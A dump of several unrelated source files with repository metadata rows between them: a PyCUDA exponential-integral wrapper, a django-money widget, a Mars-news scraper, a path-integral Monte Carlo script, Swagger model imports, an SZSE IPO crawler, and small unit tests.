__global__ void e1z(COMPLEX *z, COMPLEX *e,
unsigned int N) {
unsigned int idx = blockIdx.y*blockDim.x*gridDim.x+
blockIdx.x*blockDim.x+threadIdx.x;
if (idx < N)
e[idx] = _e1z(z[idx]);
}
""")
def e1z(z_gpu):
    """
    Exponential integral with `n = 1` of complex arguments.

    Parameters
    ----------
    z_gpu : GPUArray
        Input matrix of shape `(m, n)`; dtype must be complex64 or
        complex128.

    Returns
    -------
    e_gpu : GPUArray
        GPUarrays containing the exponential integrals of
        the entries of `z_gpu`.

    Raises
    ------
    ValueError
        If `z_gpu` has a dtype other than complex64/complex128.

    Examples
    --------
    >>> import pycuda.gpuarray as gpuarray
    >>> import pycuda.autoinit
    >>> import numpy as np
    >>> import scipy.special
    >>> import special
    >>> z = np.asarray(np.random.rand(4, 4)+1j*np.random.rand(4, 4), np.complex64)
    >>> z_gpu = gpuarray.to_gpu(z)
    >>> e_gpu = e1z(z_gpu)
    >>> e_sp = scipy.special.exp1(z)
    >>> np.allclose(e_sp, e_gpu.get())
    True
    """
    # Choose the single- or double-precision branch of the CUDA template.
    if z_gpu.dtype == np.complex64:
        use_double = 0
    elif z_gpu.dtype == np.complex128:
        use_double = 1
    else:
        raise ValueError('unsupported type')

    # Get block/grid sizes; the number of threads per block is limited
    # to 256 because the e1z kernel defined above uses too many
    # registers to be invoked more threads per block:
    dev = get_current_device()
    max_threads_per_block = 256
    block_dim, grid_dim = select_block_grid_sizes(dev, z_gpu.shape, max_threads_per_block)

    # cache_dir=False disables PyCUDA's kernel cache when debugging to make
    # sure the compiled kernel is not cached; None uses the default cache:
    cache_dir=None
    e1z_mod = \
             SourceModule(e1z_mod_template.substitute(use_double=use_double),
                          cache_dir=cache_dir)
    e1z_func = e1z_mod.get_function("e1z")

    # Allocate the output with the same shape/dtype as the input and launch.
    e_gpu = gpuarray.empty_like(z_gpu)
    e1z_func(z_gpu, e_gpu,
             np.uint32(z_gpu.size),
             block=block_dim,
             grid=grid_dim)
    return e_gpu
if __name__ == "__main__":
import doctest
doctest.testmod()
| [
"lev@columbia.edu"
] | lev@columbia.edu |
9985402449b77dd2fda3edef41399a64fc307d8c | 146819090fefeaddeadad8d4659919868e893537 | /cvproject/Lib/site-packages/djmoney/forms/widgets.py | c16a5515a4cb635ad1f087126052151d8ddb48fb | [
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-python-cwi",
"GPL-1.0-or-later",
"LicenseRef-scancode-newlib-historical",
"OpenSSL",
"bzip2-1.0.6",
"Python-2.0",
"TCL",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-other-copyleft"
] | permissive | MdReyajuddin/Big-Project-Codes | d5ec071bc5efc65ebdd07e757139a8ee67359706 | 79ab22f2f51e29e2ff17f680306877559c719a56 | refs/heads/master | 2022-12-01T04:17:39.138523 | 2020-03-17T18:51:40 | 2020-03-17T18:51:40 | 248,046,679 | 0 | 0 | BSD-3-Clause | 2022-11-22T04:40:11 | 2020-03-17T18:40:05 | Python | UTF-8 | Python | false | false | 874 | py | # -*- coding: utf-8 -*-
from django.forms import MultiWidget, Select, TextInput
from ..settings import CURRENCY_CHOICES
__all__ = ("MoneyWidget",)
class MoneyWidget(MultiWidget):
    """Composite form widget pairing an amount input with a currency select.

    Renders two sub-widgets: one for the numeric amount and one for the
    currency code, pre-populated from ``CURRENCY_CHOICES`` unless a custom
    currency widget is supplied.
    """

    def __init__(
        self,
        choices=CURRENCY_CHOICES,
        amount_widget=TextInput,
        currency_widget=None,
        default_currency=None,
        *args,
        **kwargs
    ):
        self.default_currency = default_currency
        # Build a default currency selector when none was provided.
        if not currency_widget:
            currency_widget = Select(choices=choices)
        super(MoneyWidget, self).__init__(
            (amount_widget, currency_widget), *args, **kwargs
        )

    def decompress(self, value):
        """Split *value* into ``[amount, currency]`` for the sub-widgets."""
        if value is None:
            return [None, self.default_currency]
        if isinstance(value, (list, tuple)):
            return value
        # Assumed to be a Money-like object exposing .amount/.currency.
        return [value.amount, value.currency]
| [
"md.reyajuddin45@gmail.com"
] | md.reyajuddin45@gmail.com |
0764bdbf763f0bf71ecedac5f306b8263fc7c589 | c08b5edb5075e7840e716b0a09006dae0a4d05ac | /.history/Missions_to_Mars/scrape_mars_20200812110529.py | dad4048c45ed15c13a2ed258346030ab05ae1724 | [] | no_license | OlgaDlzk/web-scraping-challenge-1 | 06f915eb76c55c9bc37889017dd9af81122dc1a5 | f99c3436dfb0169595c46dae7733d90e21385cc6 | refs/heads/master | 2023-03-18T00:58:37.928024 | 2020-09-22T20:32:47 | 2020-09-22T20:32:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,710 | py | from splinter import Browser
from bs4 import BeautifulSoup as bs
import pandas as pd
import time
import re
# This is for debugging
def savetofile(contents):
    """Write *contents* to '_temporary.txt' in UTF-8 (debugging helper).

    Fix: uses a context manager so the file handle is closed even when the
    write raises; the original left the handle open on error.
    """
    with open('_temporary.txt', "w", encoding="utf-8") as file:
        file.write(contents)
def scrape():
    """Scrape Mars-related data from several live sites into one dict.

    Drives a (non-headless) Chrome browser via splinter and collects: the
    latest NASA news headline/teaser, the JPL featured image URL, the most
    recent InSight weather tweet, a Mars facts table as HTML, and the four
    hemisphere image URLs.  Requires `chromedriver` on PATH and network
    access; the fixed sleeps give pages time to render.

    Returns a dict with keys: news_title, news_p, featured_image_url,
    mars_weather, marsfacts_html, hemisphere_image_urls.
    """
    executable_path = {"executable_path": "chromedriver"}
    browser = Browser("chrome", **executable_path, headless=False)

    # NASA Mars News: the first slide holds the newest article.
    url = 'https://mars.nasa.gov/news/'
    browser.visit(url)
    time.sleep(3)
    html = browser.html
    soup = bs(html, 'html.parser')
    slides = soup.find_all('li', class_='slide')
    content_title = slides[0].find('div', class_='content_title')
    news_title = content_title.text.strip()
    article_teaser_body = slides[0].find('div', class_='article_teaser_body')
    news_p = article_teaser_body.text.strip()

    # JPL Mars Space Images: featured image linked from the fancybox button.
    base_url = 'https://www.jpl.nasa.gov'
    url = base_url + '/spaceimages/?search=&category=Mars'
    browser.visit(url)
    time.sleep(1)
    html = browser.html
    soup = bs(html, 'html.parser')
    featured_image_url = base_url + soup.find('a',class_='button fancybox')['data-fancybox-href']

    # Mars Weather: latest @MarsWxReport tweet that mentions 'InSight'.
    mars_weather = []
    url = 'https://twitter.com/marswxreport?lang=en'
    browser.visit(url)
    time.sleep(3)
    weather_html = browser.html
    soup = bs(weather_html, "html.parser")
    # NOTE(review): the page is fetched and parsed twice in a row —
    # presumably a leftover retry; confirm the duplicate is intentional.
    weather_html = browser.html
    soup = bs(weather_html, "html.parser")
    # print(weathersoup.prettify())
    # Two selector generations are tried because Twitter's markup changed.
    mars_tweets = [soup.find_all('p', class_="TweetTextSize"), soup.find_all(
        'span', class_="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0")]
    for tweets in mars_tweets:
        mars_tweet = tweets
        for tweet in mars_tweet:
            if 'InSight' in tweet.text:
                mars_weather = tweet.text
                # NOTE(review): `tweet.a in tweet` checks whether the anchor
                # tag is a direct member of the tweet to strip its text;
                # verify behavior when the tweet has no anchor (tweet.a None).
                if tweet.a in tweet:
                    mars_weather = mars_weather.strip(tweet.a.text)
                break

    # Mars facts: first table that parses cleanly is kept as an HTML snippet.
    url = 'https://space-facts.com/mars/'
    browser.visit(url) # not necessary, but added for checking the operation
    time.sleep(1)
    dfs = pd.read_html(url)
    for df in dfs:
        try:
            df = df.rename(columns={0: "Description", 1: "Value"})
            df = df.set_index("Description")
            marsfacts_html = df.to_html().replace('\n', '')
            # df.to_html('marsfacts.html') # to save to a file to test
            break
        except:
            # NOTE(review): bare except silently skips malformed tables; if
            # every table fails, marsfacts_html stays unbound and the dict
            # build below raises NameError.
            continue

    # Mars Hemispheres: collect a title and full-size image URL for each.
    base_url = 'https://astrogeology.usgs.gov'
    url = base_url + '/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'
    browser.visit(url)
    time.sleep(1)
    html = browser.html
    soup = bs(html, 'html.parser')
    items = soup.find_all('div', class_='item')
    urls = []
    titles = []
    for item in items:
        urls.append(base_url + item.find('a')['href'])
        titles.append(item.find('h3').text.strip())
    img_urls = []
    for oneurl in urls:
        browser.visit(oneurl)
        time.sleep(1)
        html = browser.html
        soup = bs(html, 'html.parser')
        oneurl = base_url+soup.find('img',class_='wide-image')['src']
        img_urls.append(oneurl)
    hemisphere_image_urls = []
    for i in range(len(titles)):
        hemisphere_image_urls.append({'title':titles[i],'img_url':img_urls[i]})

    # Assigning scraped data to a page
    marspage = {}
    marspage["news_title"] = news_title
    marspage["news_p"] = news_p
    marspage["featured_image_url"] = featured_image_url
    marspage["mars_weather"] = mars_weather
    marspage["marsfacts_html"] = marsfacts_html
    marspage["hemisphere_image_urls"] = hemisphere_image_urls
    return marspage
| [
"ermiasgelaye@gmail.com"
] | ermiasgelaye@gmail.com |
6655971d554a867325a97ca8bb88cc7028197341 | ded10c2f2f5f91c44ec950237a59225e8486abd8 | /.history/2/path_integral_naive_sampling_20200417194827.py | 27213765902c7bcf85d6811029ac2960cb932a76 | [] | no_license | jearistiz/Statistical-Physics-Projects | 276a86407b32ded4e06b32efb2fadbd8eff8daed | d9c5b16a50856e148dc8604d92b6de3ea21fc552 | refs/heads/master | 2022-11-05T03:41:23.623050 | 2020-06-28T06:36:05 | 2020-06-28T06:36:05 | 254,909,897 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,118 | py | # -*- coding: utf-8 -*-
from __future__ import division
import os
import numpy as np
import matplotlib.pyplot as plt
from time import time
import pandas as pd
# Author: Juan Esteban Aristizabal-Zuluaga
# date: 202004151200
def rho_free(x,xp,beta):
    """Free-particle density-matrix element.

    Usage: returns the density-matrix element <x|exp(-beta*H)|xp> for a
    free particle on an infinite torus, in reduced units.
    """
    return (2.*np.pi*beta)**(-0.5) * np.exp(-(x-xp)**2 / (2 * beta) )
def harmonic_potential(x):
    """Return the harmonic-potential value V(x) = x**2 / 2 at position x."""
    return 0.5* x**2
def anharmonic_potential(x):
    """Return the anharmonic potential V(x) = x**2/2 - x**3 + x**4 at x."""
    # return np.abs(x)*(1+np.cos(x))  # this potential gives an interesting result
    return 0.5*x**2 - x**3 + x**4
def QHO_canonical_ensemble(x,beta):
    """
    Usage: computes the theoretical quantum probability of finding the
    harmonic oscillator (immersed in a heat bath at inverse temperature
    beta) at position x.

    Receives:
        x: float    -> position
        beta: float -> inverse temperature in reduced units, beta = 1/T.
    Returns:
        theoretical quantum probability density at position x for inverse
        temperature beta.
    """
    return (np.tanh(beta/2.)/np.pi)**0.5 * np.exp(- x**2 * np.tanh(beta/2.))
def path_naive_sampling(N_path = 10,beta = 4., N_iter = int(1e5), delta = 0.5, potential = harmonic_potential, append_every = 1):
    """Sample quantum paths with the naive path-integral Metropolis method.

    Proposes single-bead displacements drawn from uniform(-delta, delta) on
    a periodic path of N_path imaginary-time slices and accepts them with
    the Metropolis rule; a copy of the path is stored every `append_every`
    steps (the initial all-zero path is stored as well).

    Returns a numpy array of shape (n_snapshots, N_path) with the stored
    paths.
    """
    n_steps = int(N_iter)
    dtau = beta/n_steps * 0 + beta/N_path   # imaginary-time slice width
    chain = [0.] * N_path                   # current path, started at x = 0
    snapshots = [chain[:]]                  # stored copies of the path
    start = time()
    for step in range(n_steps):
        # Pick a random bead; neighbours wrap around (periodic boundaries).
        bead = np.random.randint(0, N_path)
        nxt, prv = (bead + 1) % N_path, (bead - 1) % N_path
        proposal = chain[bead] + np.random.uniform(-delta, delta)
        weight_old = (rho_free(chain[prv], chain[bead], dtau) *
                      np.exp(-dtau * potential(chain[bead])) *
                      rho_free(chain[bead], chain[nxt], dtau))
        weight_new = (rho_free(chain[prv], proposal, dtau) *
                      np.exp(-dtau * potential(proposal)) *
                      rho_free(proposal, chain[nxt], dtau))
        # Metropolis acceptance test.
        if np.random.uniform(0, 1) < weight_new / weight_old:
            chain[bead] = proposal
        if step % append_every == 0:
            snapshots.append(chain[:])
    elapsed = time() - start
    print('Path integral naive sampling: %d iterations -> %.2E seconds'%(n_steps, elapsed))
    return np.array(snapshots)
def figures_fn( pathss_x, beta = 4 , N_plot = 201, x_max = 3, N_iter=int(1e5), append_every=1,
                N_beta_ticks = 11, msq_file='file.csv', file_name='path-plot-prueba',
                show_path=True, show_matrix_squaring=True, save_plot=True, show_plot=True):
    """Plot the sampled position histogram against reference curves.

    Draws the theoretical QHO density, optionally the matrix-squaring
    result read from `msq_file` (CSV with 'position_x'/'prob_density'
    columns), a histogram of the first bead of every path in `pathss_x`,
    and — when `show_path` is True — the last sampled path on a secondary
    imaginary-time axis.  Figures are saved as EPS next to this script.
    Returns 0.
    """
    script_dir=os.path.dirname(os.path.abspath(__file__))
    x_plot = np.linspace(-x_max,x_max,N_plot)
    # Enlarge fonts and render all figure text with LaTeX.
    plt.rc('text', usetex=True)  # use LaTeX in figure text
    # NOTE(review): 'text.latex.unicode' was removed in matplotlib >= 3.0;
    # this line fails on modern matplotlib — confirm the pinned version.
    plt.rcParams.update({'font.size':15,'text.latex.unicode':True})
    fig, ax1 = plt.subplots()
    ax1.set_xlabel(u'$x$')
    ax1.set_ylabel(u'$\pi^{(Q)} (x;\\beta)$')
    lns1 = ax1.plot(x_plot,QHO_canonical_ensemble(x_plot,beta),label=u'Teórico')
    if show_matrix_squaring:
        msq_file = script_dir + '/' + msq_file
        matrix_squaring_data = pd.read_csv(msq_file, index_col=0, comment='#')
        lns2 = ax1.plot( matrix_squaring_data['position_x'],matrix_squaring_data['prob_density'],
                         label = u'Algoritmo Matrix\nSquaring')
    # NOTE(review): hist's 'normed' kwarg was removed in matplotlib >= 3.1
    # (replaced by density=True); also, lns2 is unbound further below when
    # show_matrix_squaring is False while show_path is True.
    lns3 = ax1.hist(pathss_x[:,0], bins=int(np.sqrt(N_iter/append_every)), normed=True,
                    label=u'Integral de camino\nnaive sampling')
    ax1.tick_params(axis='y')
    ax1.set_ylim(bottom=0)
    ax1.set_xlim(-x_max,x_max)
    if not show_path:
        plt.legend(loc = 'best')
        if save_plot:
            plt.savefig(script_dir+'/'+file_name+'.eps')
        if show_plot:
            plt.show()
        plt.close()
    if show_path:
        ax2 = ax1.twinx()  # instantiate a second axes that shares the same x-axis
        ax2.set_ylabel(u'$\\tau$')  # we already handled the x-label with ax1
        N_path = len(pathss_x[-1])
        beta_plot = np.linspace(0,beta,N_path+1)
        # Close the path periodically: repeat the first bead at tau = beta.
        path_plot = list(pathss_x[-1])
        path_plot.append(pathss_x[-1][0])
        lns4 = ax2.plot(path_plot, beta_plot,'o-',c='k',label=u'Path')
        ax2.tick_params(axis='y')
        beta_ticks = np.linspace(0,beta,N_beta_ticks)
        ax2.set_yticks(beta_ticks)
        ax2.set_yticklabels(u'$%.2f$'%b for b in beta_ticks)
        ax2.set_ylim(bottom=0)
        ax2.set_xlim(-x_max,x_max)
        # Solution for having legends that share two different scales
        leg = lns1 + lns2 + [lns3[2][0]] + lns4
        labs = [l.get_label() for l in leg]
        ax1.legend(leg, labs, loc='best',title=u'$\\beta=%.2f$'%beta, fontsize=12)
        fig.tight_layout()  # otherwise the right y-label is slightly clipped
        if save_plot:
            plt.savefig(script_dir+'/'+file_name+'-path_true.eps')
        if show_plot:
            plt.show()
        plt.close()
    return 0
# ----- Script driver: naive-sampling path integral for the QHO -----
N_path = 10          # number of imaginary-time slices per path
beta = 4.            # inverse temperature
N_iter = int(1e4)    # Monte Carlo iterations
delta = 0.5          # half-width of the uniform proposal move
potential, potential_string = harmonic_potential, 'harmonic_potential'
append_every = 1     # store every path snapshot
# NOTE(review): the call below hard-codes N_iter=int(1e4) and ignores the
# delta / append_every / potential variables defined above — confirm intended.
pathss_x = path_naive_sampling(N_iter=int(1e4))
#script_dir = os.path.dirname(os.path.abspath(__file__)) # full path for this script
# Matrix-squaring reference data for the comparison plot.
msq_file = 'pi_x-ms-harmonic_potential-x_max_5.000-nx_201-N_iter_7-beta_fin_4.000.csv'
N_plot = 201
x_max = 3
x_plot = np.linspace(-x_max,x_max,N_plot)
# Output file name encodes the run parameters.
plot_file_name = 'pi_x-pi-plot-%s-x_max_%.3f-N_path_%d-N_iter_%d-beta_fin_%.3f'\
                    %(potential_string,x_max,N_path,N_iter,beta)
figures_fn( pathss_x, beta = beta , N_plot = N_plot, x_max = x_max, N_iter=N_iter,
            N_beta_ticks = N_path+1, msq_file=msq_file, file_name=plot_file_name,
            show_path=True, show_matrix_squaring=True, save_plot=True, show_plot=False)
"jeaz.git@gmail.com"
] | jeaz.git@gmail.com |
4d1fefe592c0fe8d3fc87942e60245cf88efc8b1 | 596e92d0d484b6e7eee6d322e72e52748fdeaa5d | /sportsdata/nba_odds/models/__init__.py | 3deb348f2b98ad8e2c5f92f17542ca97f21454ec | [] | no_license | scottypate/sportsdata | f5f61ddc7eb482883f93737c6ce73dd814ed4336 | a07955ab50bf4fff1ce114ed9895095ff770c473 | refs/heads/main | 2023-08-18T16:51:56.452678 | 2021-10-22T12:44:08 | 2021-10-22T12:44:08 | 420,062,350 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,951 | py | # coding: utf-8
# flake8: noqa
"""
NBA v3 Odds
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into model package
from sportsdata.nba_odds.models.nba_odds_betting_entity_metadata import NbaOddsBettingEntityMetadata
from sportsdata.nba_odds.models.nba_odds_betting_event import NbaOddsBettingEvent
from sportsdata.nba_odds.models.nba_odds_betting_market import NbaOddsBettingMarket
from sportsdata.nba_odds.models.nba_odds_betting_market_result import NbaOddsBettingMarketResult
from sportsdata.nba_odds.models.nba_odds_betting_market_split import NbaOddsBettingMarketSplit
from sportsdata.nba_odds.models.nba_odds_betting_outcome import NbaOddsBettingOutcome
from sportsdata.nba_odds.models.nba_odds_betting_outcome_result import NbaOddsBettingOutcomeResult
from sportsdata.nba_odds.models.nba_odds_betting_split import NbaOddsBettingSplit
from sportsdata.nba_odds.models.nba_odds_consensus_outcome import NbaOddsConsensusOutcome
from sportsdata.nba_odds.models.nba_odds_game import NbaOddsGame
from sportsdata.nba_odds.models.nba_odds_game_betting_split import NbaOddsGameBettingSplit
from sportsdata.nba_odds.models.nba_odds_game_info import NbaOddsGameInfo
from sportsdata.nba_odds.models.nba_odds_game_odd import NbaOddsGameOdd
from sportsdata.nba_odds.models.nba_odds_matchup_trends import NbaOddsMatchupTrends
from sportsdata.nba_odds.models.nba_odds_player_prop import NbaOddsPlayerProp
from sportsdata.nba_odds.models.nba_odds_quarter import NbaOddsQuarter
from sportsdata.nba_odds.models.nba_odds_sportsbook import NbaOddsSportsbook
from sportsdata.nba_odds.models.nba_odds_team_game_trends import NbaOddsTeamGameTrends
from sportsdata.nba_odds.models.nba_odds_team_trends import NbaOddsTeamTrends
| [
"scotty.pate@auth0.com"
] | scotty.pate@auth0.com |
ec00fa8dbeafca6163d5777781721771db5178fe | 0a973640f0b02d7f3cf9211fcce33221c3a50c88 | /.history/src/sz_IPO_crawler_20210125145435.py | 2568a261c5c7c16de47a6b2efa3fab2001615b19 | [] | no_license | JiajunChen123/IPO_under_review_crawler | 5468b9079950fdd11c5e3ce45af2c75ccb30323c | 031aac915ebe350ec816c05a29b5827fde588567 | refs/heads/main | 2023-02-26T08:23:09.622725 | 2021-02-04T10:11:16 | 2021-02-04T10:11:16 | 332,619,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,992 | py | import requests
import re
import json
import pickle
import os
import random
import time
from urllib.parse import urlencode
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',}
# 'Accept': '*/*',
# 'Accept-Encoding': 'gzip, deflate',
# 'Accept-Language': 'zh-CN,zh;q=0.9',
# 'Connection': 'keep-alive',
# 'Host': 'listing.szse.cn'}
def index_getter(projtype):
    """Download the SZSE project index for one review category.

    Parameters:
        projtype: one of 'ipo', 'refinance' or 'reproperty'.

    Returns:
        The list of project dicts (also pickled to the working directory),
        or None when projtype is invalid.
    """
    # Map the human-readable category to the API's bizType code.
    biz_codes = {'ipo': 1, 'refinance': 2, 'reproperty': 3}
    if projtype not in biz_codes:
        print("Input error! Please choose the correct type of data")
        return
    params = {'bizType': biz_codes[projtype], 'random': random.random(),
              'pageIndex': 0, 'pageSize': 1000}
    base_url = 'http://listing.szse.cn/api/ras/projectrends/query?'
    projList_url = base_url + urlencode(params)
    r = requests.get(projList_url, headers=headers)
    index_list = json.loads(r.text)
    # FIX: save_obj() appends '.pkl' itself; the original passed a name that
    # already ended in '.pkl', producing 'sz_index_<type>.pkl.pkl' files.
    save_obj(index_list['data'], os.getcwd() + '/' + 'sz_index' + '_' + projtype)
    return index_list['data']
def data_getter(prjid):
    """Fetch one project's detail record and pickle it under ./data/.

    Parameters:
        prjid: project id (string) as returned by index_getter().

    Returns:
        The decoded 'data' dict from the API response.
    """
    base_url = 'http://listing.szse.cn/api/ras/projectrends/details?id='
    stock_url = base_url + prjid
    r = requests.get(stock_url, headers=headers)
    stockInfo = json.loads(r.text)['data']
    # Lay the pickle out as data/<biz type>/<company name>/sz_info.pkl.
    base_path = os.getcwd() + '/data/'
    directory = base_path + '/' + stockInfo['biztyp'] + '/' + stockInfo['cmpnm']
    if not os.path.exists(directory):
        os.makedirs(directory)
    # FIX: save_obj() appends '.pkl' itself; the original passed
    # 'sz_info.pkl' and produced 'sz_info.pkl.pkl'.
    save_obj(stockInfo, directory + '/' + 'sz_info')
    return stockInfo
def file_getter(stockInfo):
    """Download every disclosure attachment listed in *stockInfo*.

    Files are written to ./<company name>/ with their original names,
    pausing 1-3 seconds between downloads to avoid hammering the server.
    """
    base_path = os.getcwd()
    # FIX: the original read "base_path + '/' + +stockInfo['cmpnm']" — the
    # stray unary '+' applied to a str raises TypeError at runtime.
    directory = base_path + '/' + stockInfo['cmpnm']
    if not os.path.exists(directory):
        os.makedirs(directory)
    # (The unused 'enquiryResponseAttachment' lookup was dropped.)
    disclosure = stockInfo['disclosureMaterials']
    base_url = 'http://reportdocs.static.szse.cn'
    for prj in disclosure:
        filePath = prj['dfpth']
        filename = directory + '\\' + prj['dfnm']
        download_url = base_url + filePath
        time.sleep(random.randint(1, 3))
        r = requests.get(download_url, headers=headers)
        with open(filename, 'wb') as f:
            f.write(r.content)
def save_obj(obj, directory):
    """Pickle *obj* to ``<directory>.pkl`` using the highest protocol."""
    target = directory + '.pkl'
    with open(target, 'wb') as handle:
        pickle.dump(obj, handle, pickle.HIGHEST_PROTOCOL)
def load_obj(directory):
    """Unpickle and return the object stored at ``<directory>.pkl``."""
    with open(directory + '.pkl', 'rb') as handle:
        return pickle.load(handle)
if __name__ == '__main__':
    # FIX: index_getter() requires a category argument; the original call
    # passed none and raised TypeError.  'ipo' matches the crawl the
    # commented-out loop below was written for.
    proj_list = index_getter('ipo')
    # print('there are total {} stocks in the list'.format(len(proj_list)))
    # i=0
    # for proj in proj_list:
    #     i+=1
    #     print('fetching number project {},{}'.format(i,proj['cmpsnm']))
    #     prjid = proj['prjid']
    #     stockInfo = data_getter(str(prjid))
    #     # file_getter(stockInfo)
    #     time.sleep(random.randint(2,5))
    # print('Update completed!!!!')
"chenjiajun.jason@outlook.com"
] | chenjiajun.jason@outlook.com |
fdc9fd8f92918ca6771e9e0ad94abfe344f6114c | 23d962a8e36b4a58e63e15f3c61a88b537a80f6e | /test/unit/mongo_class/server_is_locked.py | d7861bb5324cd04455a669a9b1e26c6234b271a3 | [
"MIT"
] | permissive | deepcoder42/mongo-lib | 3a893d38edb3e03decff0cfbcbf29339026909f9 | fa2b65587ab88ee90c9d85f12dd642c6295e0d94 | refs/heads/master | 2023-06-14T10:10:12.032877 | 2021-07-13T15:22:17 | 2021-07-13T15:22:17 | 337,179,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,875 | py | #!/usr/bin/python
# Classification (U)
"""Program: server_is_locked.py
Description: Unit testing of Server.is_locked in mongo_class.py.
Usage:
test/unit/mongo_class/server_is_locked.py
Arguments:
"""
# Libraries and Global Variables
# Standard
import sys
import os
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
# Third-party
# Local
sys.path.append(os.getcwd())
import mongo_class
import version
__version__ = version.__version__
class Conn(object):

    """Class: Conn

    Description: Minimal stand-in for a mongo connection object.  It
        exposes only the `is_locked` attribute that Rep.is_locked reads,
        fixed to True so the test has a known value to assert on.

    Methods:
        __init__

    """

    def __init__(self):

        """Function: __init__

        Description: Set the stubbed Rep.conn.is_locked attribute.

        Arguments:

        """

        self.is_locked = True
class UnitTest(unittest.TestCase):

    """Class: UnitTest

    Description: Unit test for the is_locked method (exercised here through
        mongo_class.Rep; the module docstring refers to Server.is_locked).

    Methods:
        setUp
        test_is_locked

    """

    def setUp(self):

        """Function: setUp

        Description: Initialization for unit testing.

        Arguments:

        """

        self.name = "Mongo_Server"
        self.user = "mongo_user"
        self.japd = "mongo_pd"
        self.host = "host_server"
        self.port = 27017
        # The attributes below are not used by test_is_locked; kept for
        # parity with the other tests in this suite.
        self.dbs = "test"
        self.coll = None
        self.db_auth = None
        self.repset = "mongo_repset"
        self.nodes = ["node1", "node2"]

    def test_is_locked(self):

        """Function: test_is_locked

        Description: Test is_locked method.

        Arguments:

        """

        mongo = mongo_class.Rep(self.name, self.user, self.japd, self.host,
                                self.port)
        mongo.conn = Conn()

        # assertTrue is the idiomatic form of assertEqual(..., True).
        self.assertTrue(mongo.is_locked())
if __name__ == "__main__":
unittest.main()
| [
"deepcoder42@gmail.com"
] | deepcoder42@gmail.com |
667e8cbd9f81dcd1adcb4e66abeaed066ae757ba | fa6204d88a35af62357cfd5091217cbc2087b779 | /blogclient/api/client.py | 223c1abb037c9629adcc026bad8833da7d542f4a | [] | no_license | StephenTao/python-blogclient | 9acaa25e2a4e2bc1a29b02791d6338ee41a91c5b | 6543668f8db6f83751be42464cb4065472972388 | refs/heads/master | 2021-01-10T15:46:34.529878 | 2016-02-25T07:30:16 | 2016-02-25T07:30:16 | 52,505,499 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,681 | py | # Copyright 2013 - Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
from blogclient.api.v1 import client as client_v1
def client(blog_url=None, username=None, api_key=None,
           project_name=None, auth_url=None, project_id=None,
           endpoint_type='publicURL', service_type='workflow',
           auth_token=None, user_id=None, cacert=None):
    """Build and return a v1 blog API client.

    When no `blog_url` is supplied, the local development endpoint
    http://localhost:8989/v1 is used.  A truthy non-string `blog_url`
    is rejected.
    """
    if blog_url and not isinstance(blog_url, six.string_types):
        raise RuntimeError('Blog url should be a string.')

    # Fall back to the local default endpoint when no URL was given.
    blog_url = blog_url or "http://localhost:8989/v1"

    settings = dict(
        blog_url=blog_url,
        username=username,
        api_key=api_key,
        project_name=project_name,
        auth_url=auth_url,
        project_id=project_id,
        endpoint_type=endpoint_type,
        service_type=service_type,
        auth_token=auth_token,
        user_id=user_id,
        cacert=cacert,
    )
    return client_v1.Client(**settings)
def determine_client_version(blog_url):
    """Return the major API version encoded in *blog_url*.

    Only v1 is currently recognized.

    :raises RuntimeError: if no known version marker is present.
    """
    # Membership test is the idiomatic form of the old `.find(...) != -1`.
    if "v1" in blog_url:
        return 1
    raise RuntimeError("Can not determine blog API version")
| [
"stephenhuang@augmentum.com.cn"
] | stephenhuang@augmentum.com.cn |
8b5451e8e262b8fb4e784eb42c74bd0c64603b5a | 6160586aa239eada16e735d40d57970dedbe1dfc | /case/user_manage/user_info/test_user_query_info_byauthcode.py | 149975f8bde64ddd7f75f83bf84f12cfe3838b33 | [] | no_license | showgea/AIOT | 7f9ffcd49da54836714b3342232cdba330d11e6c | fe8275aba1c4b5402c7c2c2987509c0ecf49f330 | refs/heads/master | 2020-07-23T10:19:37.478456 | 2019-09-23T12:25:59 | 2019-09-23T12:25:59 | 207,525,184 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,773 | py | import unittest
import json
from modules.user_manage.user_info.user_query_info_byauthcode import *
from common.get_result_db import get_common_code
account_mail_Gary = readcfg.account_mail_Gary
account_wrong = readcfg.account_wrong
userId = readcfg.userId_Gary
authCode = readcfg.authCode_wrong
class TestUserQueryInfoByAuthCode(unittest.TestCase):
    """
    Fetch a user's basic info by account plus verification (auth) code.
    """
    @classmethod
    def setUpClass(cls):
        # Request one e-mail auth code up front and share it across tests.
        cls.authCode_email = get_common_code()
    def test_user_query_info_byauthcode_01(self):
        """Happy path: account plus a fresh auth code returns the expected userId."""
        result = user_query_info_byauthcode(account_mail_Gary, self.authCode_email)
        # print(self.authCode_phone)
        userId_api = json.loads(result.text)["result"]["userId"]
        self.assertEqual(userId, userId_api, "查询接口返回userId:%s" % userId_api)
    def test_user_query_info_byauthcode_02(self):
        """Wrong / nonexistent account -> error code 811."""
        result = user_query_info_byauthcode(account_wrong, authCode)
        self.assertIn('"code":811', result.text)
    def test_user_query_info_byauthcode_03(self):
        """Empty account -> error code 302."""
        result = user_query_info_byauthcode("", authCode)
        self.assertIn('"code":302', result.text)
